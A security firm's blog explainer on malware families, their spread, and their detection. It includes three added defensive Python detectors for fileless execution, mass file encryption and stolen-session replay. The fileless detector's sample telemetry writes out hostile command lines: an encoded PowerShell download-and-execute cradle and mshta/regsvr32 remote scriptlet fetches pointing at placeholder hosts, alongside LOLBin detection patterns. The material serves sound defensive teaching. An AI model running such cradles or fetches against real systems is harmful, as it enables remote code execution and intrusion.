
Types of Malware: Definition, Real Examples and Detection

What malware is and the 12 main types (virus, worm, trojan, ransomware, spyware, rootkit, RAT, fileless) with examples and defence.

Secra · May 7, 2026 · 12 min read

Malware is any software designed to perform unauthorised actions on a computer system without the owner's consent: steal data, encrypt files, spy on users, maintain persistent access or turn the machine into part of a larger criminal infrastructure. The term covers very different families (a virus, ransomware and an infostealer are all malware, but they behave, spread and get detected very differently). Knowing the types isn't an academic exercise: it changes which controls a security team applies and how it prioritises the response when an alert fires.

This piece explains what malware is and how it spreads, walks through the 12 families any defensive team meets in production today, and covers how each gets detected and blocked in practice.

What malware is

Malware is a program or piece of code whose goal is to operate against the interests of the user or the organisation owning the system. That intent is the line separating malware from legitimate software: a commercial keylogger used by a parent with a minor's consent isn't malware; the same binary stealthily installed on an employee's laptop is.

What malware actually does depends on the attacker's goal. The most common functions:

  • Steal credentials, session cookies or personal data and send them to a server controlled by the attacker.
  • Encrypt files and demand ransom (ransomware).
  • Maintain persistent remote access to the machine (RAT, backdoor, rootkit).
  • Turn the machine into a bot joining a botnet to attack other targets (DDoS, spam, crypto mining).
  • Spy on the user: capture keystrokes, microphone, camera, location or screen.
  • Sabotage the system: delete data, manipulate industrial processes (SCADA), corrupt backups.

The term "virus" became popular in the 1980s and many still use it as a synonym for malware. Technically a virus is just one specific type. It's worth keeping the distinction if your work involves incidents, because the response runbook changes a lot per family.

How malware spreads

Almost every malware incident starts with one of these vectors:

  • Phishing with attachment or link. A seemingly legitimate email inviting you to open a PDF, a Word document with macros or a URL that downloads the binary. Still vector number one.
  • Drive-by download. The victim visits a compromised site and an exploit kit leverages a browser vulnerability to execute code without interaction.
  • Unpatched exposed systems. RDP services open to the Internet, VPNs with public CVEs, admin panels without MFA. Ransomware like Royal or BlackCat got in this way during 2024-2025.
  • Supply chain. An npm package, PyPI library or a binary signed by a legitimate vendor that gets compromised. SolarWinds, 3CX and XZ Utils are the famous cases.
  • Malicious USB. Rarer in enterprise, frequent in OT sectors and restricted environments.
  • Mobile apps installed from third-party stores (Android) or via MDM profile on iOS.

Types of malware: the 12 families every defensive team meets

The most relevant families below, with operational definition, real example and key difference from similar families.

Virus

A virus is malware that inserts itself into legitimate files (executables, macro-enabled documents) and needs the user to open them to activate and propagate. Every executed copy infects new files.

Today it's a minority category in enterprise: file-infector detection is the oldest antivirus capability, code signing breaks as soon as a signed executable is modified, and Office now blocks macros in documents downloaded from the Internet by default. Still present in Office macros and some families targeting legacy systems.

Worm

A worm self-propagates over the network without needing user interaction. It exploits vulnerabilities in exposed services to hop from one machine to another.

Historical example: WannaCry (2017) used EternalBlue against SMBv1 to spread to more than 200,000 machines in a matter of days. Still-active example: Mirai (2016) and its variants infect IoT devices with default credentials and build botnets of hundreds of thousands of cameras and routers.

Trojan

A trojan disguises itself as legitimate software. The user installs it convinced it's a useful tool (a cracked installer, an alleged patch, an "invoice" PDF) and the binary executes its malicious functions alongside, or instead of, the advertised ones.

Operational example: Emotet started as a banking trojan and evolved into a distribution platform for other families (TrickBot, Ryuk, Conti). The Europol-coordinated takedown in January 2021 disrupted it; it resurfaced at the end of that year and has since faded, and Lumma Stealer and others have filled its niche.

Ransomware

Ransomware encrypts files on the machine or network and demands ransom (usually in cryptocurrency) in exchange for the decryption key. Modern variants combine encryption with double extortion: they exfiltrate the data before encrypting and threaten to publish it if no payment is made.

Active families in 2025-2026: LockBit (versions 4.0 and derivatives after Operation Cronos), BlackCat/ALPHV (partly dismantled but with re-brands), Royal, Akira, Play. Most operate under the Ransomware-as-a-Service (RaaS) model with affiliates receiving a percentage of the ransom.

Regulatory fines for poor incident handling (GDPR, NIS2) can exceed the ransom itself when ransomware affects personal data.

Spyware

Spyware gathers user information without consent: browsing habits, typed credentials, screenshots, location, microphone audio. The difference with an infostealer is persistence: spyware monitors for weeks or months; an infostealer takes whatever it finds in one pass and leaves.

Government example: Pegasus (NSO Group) used against journalists and activists. In private enterprise, spyware mostly appears as a module embedded in trojans or RATs. The neighbouring but distinct category is adware, which monetises through advertising and doesn't necessarily collect credentials.

Adware

Adware is software that displays unsolicited ads or redirects browsing traffic to attacker-affiliated sites. Historically annoying more than dangerous, but recent variants collect browsing data and open the door to other payloads.

Usually arrives bundled in poorly moderated freeware installers.

Rootkit

A rootkit modifies operating system components (kernel, drivers, bootloader) to hide its presence and that of any other malware riding along. Detection requires inspection at kernel or boot level, not just filesystem analysis.

Types: userland rootkits (modify libraries and processes in user space), kernel rootkits (load a module into the kernel), bootkits/UEFI rootkits (infect firmware or bootloader and survive OS reinstalls).

Recent case: BlackLotus (UEFI bootkit reported by ESET in 2023) did not carry a stolen signing key; it abused a vulnerability in legitimately signed Windows boot components (CVE-2022-21894) that Secure Boot still trusted, so it bypassed Secure Boot on systems that had not revoked the vulnerable boot manager. Remediation means applying the DBX revocation in firmware, not just reinstalling the operating system.

Keylogger

A keylogger captures everything the user types: passwords, messages, searches. Can be hardware (rare in enterprise) or software, and usually arrives as a module of a trojan or RAT rather than as a standalone binary.

Botnet

A botnet is a network of compromised machines coordinated by a C2 (command and control) server. Each individual machine runs a bot client. The botnet gets rented by the hour for DDoS, spam, ad fraud or as an entry point for other intrusions.

Relevant families: Emotet (delivery botnet), Mirai and derivatives (IoT), Necurs (historic spam), TrickBot (banking, now legacy).

Infostealer

An infostealer is a trojan specialised in stealing saved credentials, session cookies, crypto wallets, application tokens and sensitive files from the machine. Once it has extracted the loot, it often deletes itself rather than persisting.

It's the category with the highest growth in 2024-2026. Dominant families: Lumma Stealer, Redline, Vidar, StealC, Raccoon. The stolen logs get sold in marketplaces as initial access for ransomware: someone buys SSO session cookies of an employee, gets into the VPN or SaaS and sells that access to a ransomware group.

RAT (Remote Access Trojan)

A RAT gives the attacker interactive remote control of the machine: execute commands, transfer files, open webcam, watch the screen, pivot to other machines. Favourite tool of APT actors and espionage operations.

Classic families: Cobalt Strike (commercial pentesting tool massively abused), Sliver (open source, growing replacement), Quasar, NjRAT, AsyncRAT.

Fileless malware

Fileless malware runs code directly in memory without writing a binary to disk. It lives in legitimate system processes (PowerShell, WMI, regsvr32, mshta) and abuses native Windows utilities ("LOLBins": Living Off the Land Binaries).

Methodological example: a Cobalt Strike beacon injected into a legitimate process via a Word macro. With no dropped binary, file-scanning antivirus has nothing to match; the macro document and the script text can still be caught (AMSI hands PowerShell content to the AV engine at runtime), but reliable detection relies on EDR behavioural telemetry: Office spawning a script host, encoded command lines, injection into a legitimate process.
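As an added example (not code from this article or from any EDR vendor), the following Python sketch shows what "behavioural telemetry" means for the chain described above. It runs four illustrative rules over constructed, Sysmon-style process-creation records: Office spawning a script host, a PowerShell `-EncodedCommand` decoded so the real command becomes visible, a LOLBin handed a URL, and an in-memory download cradle. The event fields, rule names, thresholds and `example.invalid` URLs are assumptions for illustration.

```python
"""Behavioural detection over process-creation telemetry (added example).

The records below are constructed Sysmon-style ProcessCreate events, not
real telemetry; the rules are illustrative, not a vendor's rule set.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
# Native Windows binaries commonly abused to fetch or run remote code
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
           "bitsadmin.exe", "wmic.exe"}

ENCODED_RE = re.compile(r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
CRADLE_RE = re.compile(r"(?i)\bIEX\b|Invoke-Expression|DownloadString|FromBase64String")
URL_RE = re.compile(r"(?i)https?://")


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def basename(image_path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, if any.

    PowerShell expects Base64 of UTF-16LE text, so the decode must use that
    encoding; anything that fails to decode is reported as None.
    """
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events: List[dict]) -> List[Finding]:
    """Apply the behavioural rules to each ProcessCreate event in order."""
    findings: List[Finding] = []
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["command_line"]

        # Rule 1: an Office application spawning a script host is the classic
        # macro -> PowerShell chain; the document on disk looks benign.
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append(Finding("office_spawns_script_host", ev["pid"],
                                    f"{parent} -> {image}"))

        # Rule 2: decode -EncodedCommand so later rules (and the analyst)
        # see the real command rather than a Base64 blob.
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(Finding("powershell_encoded_command", ev["pid"], decoded))
        visible = cmd if decoded is None else cmd + " " + decoded

        # Rule 3: a LOLBin given a URL is fetching remote code (mshta .hta,
        # regsvr32 /i:http scriptlet, certutil -urlcache, ...).
        if image in LOLBINS and URL_RE.search(visible):
            findings.append(Finding("lolbin_remote_fetch", ev["pid"], cmd.strip()))

        # Rule 4: an in-memory download cradle, whatever process hosts it.
        if CRADLE_RE.search(visible):
            findings.append(Finding("download_cradle", ev["pid"], visible.strip()))
    return findings


# Constructed sample telemetry (URLs are placeholders under .invalid).
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"},
    {"pid": 4133, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://example.invalid/x.hta"},
    {"pid": 4140, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32 /s /n /u /i:http://example.invalid/s.sct scrobj.dll"},
    {"pid": 4150, "parent_image": r"C:\Windows\System32\svchost.exe",  # benign scheduled script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"pid": 4160, "parent_image": r"C:\Windows\explorer.exe",          # benign certutil use
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -hashfile C:\tools\setup.exe SHA256"},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

The two benign events are there on purpose: PowerShell launched by a service with a file path and certutil hashing a local file trigger nothing, which is the difference between matching on the binary name (noisy) and matching on parent, argument and payload behaviour.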

Dropper / loader

A dropper or loader is a small payload whose only job is to download and install the "real" malware. Useful to evade static detection (the dropper itself looks innocuous) and to choose the payload at runtime (the attacker decides what to deploy depending on the victim).

SmokeLoader, GuLoader and IcedID are frequent loaders in mass campaigns. After the loader phase, the attacker decides whether the victim is worth ransomware, infostealer or extended RAT.

How the different types get detected and blocked

There's no single control that covers every family. Reasonable defence combines:

  • Antivirus / EPP with signatures and ML for viruses, classic worms and known droppers. Enough for background noise, insufficient for almost everything else.
  • EDR with behavioural telemetry to detect fileless, RATs, infostealers and lateral movement. The piece that most reduces attacker dwell time.
  • SIEM correlating endpoint, network, identity and cloud telemetry. Detects chains that endpoint alone doesn't see.
  • Email security with sandbox to detonate suspicious attachments before delivering the email. Stops a large share of phishing with attached malware.
  • MFA on everything SaaS or VPN. Cancels the value of passwords stolen by infostealers and phishing, which removes most of what the criminal log marketplace sells. It does not cancel stolen post-MFA session cookies; short session lifetimes and token binding cover that gap.
  • Aggressive patch management on exposed surface: VPN, RDP, admin panels, legacy systems. Public CVE exploitation remains the second vector after phishing.
  • Network segmentation so a compromised machine doesn't end up owning the whole domain. Especially critical in industry with OT.
  • Offline tested backups. The only reliable defensive response to ransomware is restoring from a clean backup.
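"EDR with automated response to halt encryption in an early phase" is often described but rarely shown. The Python block below is an added example (not code from this article or from any EDR product) of the file-activity heuristic such a response is built on: inside a sliding window, one process both renames many files to a new extension and writes many high-entropy blobs, or it touches a planted canary document. A backup job writing compressed archives produces high-entropy data as well, which is why the rename condition is required alongside it. The events, thresholds, process names and the canary path are all constructed assumptions.

```python
"""Ransomware-style file activity detection (added example).

Constructed file-system events, not real EDR telemetry; the thresholds and
the canary path are assumptions for illustration.
"""
import math
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Decoy document planted on a share; no legitimate process should touch it.
CANARY_PATHS = {r"\\fileserver\finance\~zz_canary_do_not_open.xlsx"}


@dataclass
class FileEvent:
    ts: float           # seconds
    pid: int
    image: str
    op: str             # "write" or "rename"
    path: str
    new_path: str = ""  # target name for renames
    data: bytes = b""   # content for writes


@dataclass
class Finding:
    rule: str
    pid: int
    image: str
    detail: str


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext or compressed data, low for text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def extension(path: str) -> str:
    """Last extension of a Windows or POSIX path, lower-cased ('' if none)."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def is_high_entropy_write(ev: FileEvent, min_entropy: float) -> int:
    return int(ev.op == "write" and shannon_entropy(ev.data) >= min_entropy)


def is_extension_change(ev: FileEvent) -> int:
    return int(ev.op == "rename" and extension(ev.path) != extension(ev.new_path))


def detect_encryption(events: List[FileEvent], window: float = 10.0,
                      min_ops: int = 20, min_entropy: float = 7.0) -> List[Finding]:
    """Flag, once per process, mass rename-plus-overwrite inside a time window,
    and any touch on a canary path. Counts are maintained over a sliding window
    so a long-running process is judged on its recent burst, not its lifetime."""
    findings: List[Finding] = []
    by_pid: Dict[int, List[FileEvent]] = defaultdict(list)
    for ev in events:
        by_pid[ev.pid].append(ev)

    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e.ts)
        hi_writes = ext_changes = 0
        start = 0
        flagged_mass = flagged_canary = False
        for ev in evs:
            if not flagged_canary and (ev.path in CANARY_PATHS or ev.new_path in CANARY_PATHS):
                findings.append(Finding("canary_touched", pid, ev.image, ev.path))
                flagged_canary = True
            hi_writes += is_high_entropy_write(ev, min_entropy)
            ext_changes += is_extension_change(ev)
            # Retire events that have fallen out of the window.
            while evs[start].ts < ev.ts - window:
                old = evs[start]
                hi_writes -= is_high_entropy_write(old, min_entropy)
                ext_changes -= is_extension_change(old)
                start += 1
            if not flagged_mass and hi_writes >= min_ops and ext_changes >= min_ops:
                findings.append(Finding(
                    "mass_encryption", pid, ev.image,
                    f"{ext_changes} extension changes and {hi_writes} "
                    f"high-entropy writes within {window:g}s"))
                flagged_mass = True
    return findings


# Constructed sample content: HIGH has maximal entropy (stand-in for ciphertext).
HIGH = bytes(range(256)) * 4
TEXT = b"Quarterly figures, see attached sheet. " * 16


def build_sample() -> List[FileEvent]:
    evs: List[FileEvent] = []
    # Unknown process renaming and overwriting 40 documents in 8 seconds.
    for i in range(40):
        t = 100.0 + i * 0.2
        src = rf"\\fileserver\finance\report_{i}.docx"
        evs.append(FileEvent(t, 7310, "updater.exe", "rename", src, new_path=src + ".lckd"))
        evs.append(FileEvent(t + 0.05, 7310, "updater.exe", "write", src + ".lckd", data=HIGH))
    canary = next(iter(CANARY_PATHS))
    evs.append(FileEvent(109.0, 7310, "updater.exe", "rename", canary, new_path=canary + ".lckd"))
    # Backup job: 30 high-entropy archives but no renames, so not flagged.
    for i in range(30):
        evs.append(FileEvent(200.0 + i * 0.1, 2200, "backup.exe", "write",
                             rf"D:\backups\set_{i}.zip", data=HIGH))
    # Word saving a few plain documents.
    for i in range(3):
        evs.append(FileEvent(300.0 + i, 3300, "winword.exe", "write",
                             rf"C:\Users\ana\Documents\memo_{i}.docx", data=TEXT))
    return evs


SAMPLE_EVENTS = build_sample()

if __name__ == "__main__":
    for f in detect_encryption(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.image}: {f.detail}")
```

In a real EDR the "mass_encryption" finding would trigger the automated response (kill the process tree, isolate the host) after roughly the twentieth file rather than after the whole share; the canary rule fires on a single event, which is why decoy documents are worth planting on file servers.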

Common mistakes in malware management

Four frequent patterns that appear in incident response reports:

  1. Trusting only traditional antivirus. Covers viruses and classic worms, leaves out fileless, modern infostealers and stealthy RATs. The behavioural detection EDR provides is no longer optional.
  2. Not segmenting the network. A machine with malware becomes an organisation-wide compromise if all servers are reachable. Segmentation reduces the incident's blast radius.
  3. Not drilling the ransomware playbook. The first ransomware isn't the moment to improvise communications, payment decisions and restoration. The annual tabletop with real scenarios is what separates an hours-long containment from a weeks-long one.
  4. Assuming MFA is enough. MFA stops password theft, but modern infostealers steal post-MFA session cookies. Token binding, short sessions and active review of unusual sessions are the next controls.
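Point 4 is the one most teams have no detection for, so here is an added example (not code from this article or from any identity provider) of what "active review of unusual sessions" looks like over SIEM-enriched authentication events. Every later use of a session is compared with the fingerprint recorded when it was issued after MFA: a buyer of infostealer logs imports the cookie into their own browser, so user agent and country normally differ from the victim's, and a session still accepted beyond its maximum age points at missing server-side expiry. The events, field names, addresses and the eight-hour limit are constructed assumptions; IP changes alone are deliberately not flagged because mobile users roam.

```python
"""Detecting replay of a stolen post-MFA session (added example).

Constructed, SIEM-enriched authentication events; the schema and the
thresholds are assumptions for illustration, not a product's format.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class AuthEvent:
    ts: float         # epoch seconds
    user: str
    session_id: str   # opaque identifier of the cookie; never log the token itself
    ip: str
    country: str      # as enriched by the SIEM from a GeoIP feed
    user_agent: str


@dataclass
class Finding:
    session_id: str
    user: str
    reasons: List[str]
    ip: str


def find_session_anomalies(events: List[AuthEvent],
                           max_age: float = 8 * 3600) -> List[Finding]:
    """Compare every use of a session with the fingerprint at issuance.

    The first event per session_id is taken as the post-MFA login; later
    events with a different user agent or country, or older than max_age,
    are reported with the reasons that matched.
    """
    by_session: Dict[str, List[AuthEvent]] = defaultdict(list)
    for ev in events:
        by_session[ev.session_id].append(ev)

    findings: List[Finding] = []
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e.ts)
        issued = evs[0]
        for ev in evs[1:]:
            reasons = []
            if ev.user_agent != issued.user_agent:
                reasons.append("user_agent_changed")
            if ev.country != issued.country:
                reasons.append("country_changed")
            if ev.ts - issued.ts > max_age:
                reasons.append("session_older_than_max_age")
            if reasons:
                findings.append(Finding(sid, ev.user, reasons, ev.ip))
    return findings


# Constructed sample: alice's cookie is stolen and replayed from another
# browser and country; bob's session is normal. Addresses are documentation
# ranges (TEST-NET), not real hosts.
CHROME_WIN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
FIREFOX_LINUX = "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Firefox/125.0"

SAMPLE_EVENTS = [
    AuthEvent(1_700_000_000, "alice", "sess-a1", "203.0.113.10", "ES", CHROME_WIN),     # login after MFA
    AuthEvent(1_700_000_600, "alice", "sess-a1", "203.0.113.10", "ES", CHROME_WIN),     # normal use
    AuthEvent(1_700_005_400, "alice", "sess-a1", "198.51.100.77", "NL", FIREFOX_LINUX), # cookie replayed
    AuthEvent(1_700_040_000, "alice", "sess-a1", "198.51.100.77", "NL", FIREFOX_LINUX), # still valid 11 h later
    AuthEvent(1_700_000_100, "bob", "sess-b7", "203.0.113.22", "ES", CHROME_WIN),
    AuthEvent(1_700_003_100, "bob", "sess-b7", "203.0.113.22", "ES", CHROME_WIN),
]

if __name__ == "__main__":
    for f in find_session_anomalies(SAMPLE_EVENTS):
        print(f"{f.user} {f.session_id} from {f.ip}: {', '.join(f.reasons)}")
```

The third reason only appears because the sample identity provider kept the session alive for eleven hours; with an eight-hour lifetime enforced server-side that event would have been a rejected request, which is the cheapest of the three controls to deploy.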

Frequently asked questions

What's the difference between virus and malware?

Malware is the general term: any software designed to do harm. A virus is a specific malware category that inserts itself into files and needs the user to open them to spread. Today most enterprise incidents aren't viruses in the strict sense but trojans, ransomware, infostealers and RATs.

Which type of malware is most dangerous for a company?

It depends on the business model. For most companies, ransomware is the highest immediate impact risk (paralyses operations). For sectors with sensitive intellectual property or massive personal data, infostealers and APT RATs are more dangerous because of silent exfiltration that takes months to detect. The incidents that end worst combine both: an infostealer steals an employee's cookies, the attacker enters the SSO, moves laterally for several weeks and fires ransomware at the end.

How does malware typically enter a company?

Three paths concentrate most incidents: phishing with attachment or link, exploitation of unpatched exposed services (VPN, RDP, admin panels) and supply chain compromise (SaaS provider, code package, signed binary). Phishing remains vector number one in annual reports from ENISA, IBM and Verizon DBIR.

Does antivirus still work in 2026?

Yes, as a base layer. Detects background noise (known variants, common droppers, classic viruses) and frees the security team from having to look at every alert. What's no longer enough is trusting the endpoint only to antivirus: modern families (fileless, RATs, daily-updated infostealers) require EDR with behavioural telemetry.

What do I do if I suspect a machine has malware?

Isolate the machine from the network without powering it off (powering off destroys volatile evidence), notify the security team or a DFIR provider, and don't manipulate the system beyond what's necessary to contain. If there's no internal team, contact an incident response service immediately and, in Spain, file a report with INCIBE-CERT if you're an entity under NIS2.

How do you specifically prevent ransomware?

Four controls cover most of the risk: MFA on VPN, RDP and SaaS to cut initial access; aggressive patching of services exposed to the Internet; EDR with automated response to halt encryption in an early phase; and offline backups (not accessible from the domain) tested with real restoration at least quarterly.

  • What is a SOC: the team and processes that monitor and respond to malware alerts in production.
  • What is SIEM: the platform that correlates endpoint, network and identity telemetry to detect attack chains.
  • What is EDR: the endpoint piece that detects fileless, RATs and infostealers the traditional antivirus doesn't see.
  • What is a CVE: the identifiers of the vulnerabilities many malware families exploit to get in.
  • What is pentesting: how pentesting validates that anti-malware controls hold against a real attacker.

Malware response at Secra

At Secra we help organisations contain ongoing malware incidents (DFIR) and reinforce defensive posture to reduce the probability of it happening again (technical audit, internal SOC improvement, EDR/SIEM integration). If your team is managing an active incident or wants to prepare the playbook before the first one, get in touch via contact or check our incident response service.

About the author

Secra Solutions team

Ethical hackers with OSCP, OSEP, OSWE, CRTO, CRTL and CARTE certifications, 7+ years of experience in offensive cybersecurity, and authors of CVE-2025-40652 and CVE-2023-3512.
